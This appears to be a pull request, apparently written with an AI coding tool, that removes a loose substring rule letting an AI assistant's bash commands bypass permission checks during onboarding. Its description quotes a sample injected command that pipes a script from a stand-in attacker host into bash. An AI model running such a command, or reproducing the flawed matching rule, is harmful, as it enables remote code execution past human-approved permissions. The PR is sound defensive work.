### PR TITLE
fix: restrict onboarding auto-allow to prevent permission bypass

### DIFF
--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -292,15 +292,6 @@ function isOnboardingAutoAllowed(toolName: string, input: Record<string, unknown
     return ONBOARDING_PROMPT_FILES.some((f) => resolved === getWorkspacePromptPath(f));
   }
 
-  if (toolName === 'bash') {
-    const command = getStringField(input, 'command').trim();
-    const bootstrapPath = getWorkspacePromptPath('BOOTSTRAP.md');
-    // Allow rm commands targeting BOOTSTRAP.md (the ritual's final step)
-    if (command.includes('rm') && (command.includes('BOOTSTRAP.md') || command.includes(bootstrapPath))) {
-      return true;
-    }
-  }
-
   return false;
 }
 


### PR DESCRIPTION
## Summary
- Removes the loose bash auto-allow in `isOnboardingAutoAllowed` that used substring matching (`command.includes('rm') && command.includes('BOOTSTRAP.md')`) to bypass permission checks during onboarding
- This pattern allowed command injection (e.g., `curl http://evil.com/payload.sh | bash # rm BOOTSTRAP.md` would be auto-allowed)
- The agent can still delete BOOTSTRAP.md via `file_edit`/`file_write`, which are already properly validated against resolved workspace prompt paths

Addresses review feedback from PR #3328.

## Test plan
- [x] TypeScript type-check passes
- [ ] Verify onboarding flow still works using `file_write` to delete BOOTSTRAP.md instead of `bash rm`

🤖 Generated with [Claude Code](https://claude.com/claude-code)
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/3354" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open with Devin">
  </picture>
</a>
<!-- devin-review-badge-end -->
